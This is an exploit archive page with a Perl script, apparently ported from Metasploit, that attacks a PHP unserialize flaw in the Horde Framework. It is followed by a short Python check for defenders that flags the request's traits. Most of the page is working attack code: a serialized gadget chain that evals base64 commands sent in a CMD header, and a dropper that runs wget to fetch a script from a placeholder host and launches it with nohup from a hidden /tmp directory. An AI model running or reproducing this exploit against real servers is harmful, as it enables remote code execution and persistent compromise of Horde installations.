Horde Framework Unserialize PHP Code Execution
Source: vfocus.net Author: Macha Published: 2014-07-01
#ported from metasploit by irrlicht
#june 2014
#modify dropper url and run
use strict;
use warnings;
use LWP::UserAgent;
use WWW::Mechanize;
use MIME::Base64;

if (!$ARGV[0]) {
 print "specify full login.php url\n";
 exit;
}
my $dropper = 'system("mkdir /tmp/\\" \\"; cd /tmp/\\" \\"; wget -O deploy.pl http://0.0.0.0/deploy.pl; nohup perl deploy.pl > /dev/null 2>&1 &");';
my $command = encode_base64($dropper . "echo \"999999999\"; echo \"EXPLOITED\"; system(\"ps aux; ls -la /tmp/\\\" \\\"\"); echo \"999999999\";", "");
my $loginpath = $ARGV[0];
my $php_injection = "eval(base64_decode(\$_SERVER[HTTP_CMD]));die();";
my $payload_serialized = "_formvars=O:34:\"Horde_Kolab_Server_Decorator_Clean\":2:{s:43:\"\x00Horde_Kolab_Server_Decorator_Clean\x00_server\";";
$payload_serialized .= "O:20:\"Horde_Prefs_Identity\":2:{s:9:\"\x00*\x00_prefs\";O:11:\"Horde_Prefs\":2:{s:8:\"\x00*\x00_opts\";a:1:{s:12:\"sizecallback\";";
$payload_serialized .= "a:2:{i:0;O:12:\"Horde_Config\":1:{s:13:\"\x00*\x00_oldConfig\";s:". length($php_injection) .":\"$php_injection\";}i:1;s:13:\"readXMLConfig\";}}";
$payload_serialized .= "s:10:\"\x00*\x00_scopes\";a:1:{s:5:\"horde\";O:17:\"Horde_Prefs_Scope\":1:{s:9:\"\x00*\x00_prefs\";a:1:{i:0;i:1;}}}}";
$payload_serialized .= "s:13:\"\x00*\x00_prefnames\";a:1:{s:10:\"identities\";i:0;}}s:42:\"\x00Horde_Kolab_Server_Decorator_Clean\x00_added\";a:1:{i:0;i:1;}}";

$|=1;
my $ua = new LWP::UserAgent(ssl_opts => { verify_hostname => 0 });
$ua->timeout(3);
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13");

my $request;
$request = new HTTP::Request(POST => $loginpath);
$request->header('CMD' => $command);
$request->header('Content-Type' => "application/x-www-form-urlencoded");
$request->content($payload_serialized);

my $mech = WWW::Mechanize->new(timeout => 3, ssl_opts => { verify_hostname => 0 });
my $response = $mech->request($request);
my $code = $response->code;
my $body = $response->decoded_content;
print $response->code."\n";
#print $body."\n";
if ($body =~ /999999999/) {
 print $body."\n";
}
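For defenders, the request built above has two observable traits: a `_formvars` POST field whose value is a PHP serialized object graph, and a request header named `CMD` carrying base64. The following check is an added example, not part of the original script or of Horde; the function names and the sample requests are constructed for illustration.

```python
import base64
import binascii
import re
from urllib.parse import unquote_plus

# PHP serialize() object header: O:<name length>:"<class>":<property count>:
# (C: is the variant used by classes implementing Serializable).
SERIALIZED_OBJECT = re.compile(r'(?:^|[;{])[OC]:\d+:"([A-Za-z_\\][\w\\]*)":\d+:')

def form_fields(body):
    """Split an x-www-form-urlencoded body without treating ';' as a separator."""
    fields = {}
    for pair in body.split("&"):
        name, _, value = pair.partition("=")
        fields.setdefault(unquote_plus(name), []).append(unquote_plus(value))
    return fields

def inspect_request(headers, body):
    """Return a list of findings for one POST to a Horde login URL."""
    findings = []
    for value in form_fields(body).get("_formvars", []):
        classes = SERIALIZED_OBJECT.findall(value)
        if classes:
            findings.append("serialized object in _formvars: " + ", ".join(classes))
    for name, value in headers.items():
        if name.lower() != "cmd":
            continue
        try:
            base64.b64decode(value, validate=True)
            findings.append("CMD header holds valid base64 (%d chars)" % len(value))
        except (binascii.Error, ValueError):
            findings.append("unexpected CMD header")
    return findings

# Constructed sample requests (not captured traffic).
SAMPLES = [
    ({"Content-Type": "application/x-www-form-urlencoded"},
     "login_user=alice&login_post=1"),
    ({"CMD": base64.b64encode(b"placeholder").decode()},
     '_formvars=O:34:"Horde_Kolab_Server_Decorator_Clean":1:{s:1:"a";'
     'O:12:"Horde_Config":0:{}}'),
    ({}, "_formvars=O%3A11%3A%22Horde_Prefs%22%3A0%3A%7B%7D"),
]

if __name__ == "__main__":
    for headers, body in SAMPLES:
        print(inspect_request(headers, body) or "clean")
```

The same pattern can be applied to web server or WAF logs that record POST bodies and request headers; any hit on `_formvars` warrants checking whether the installed Horde version still unserializes that field.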

 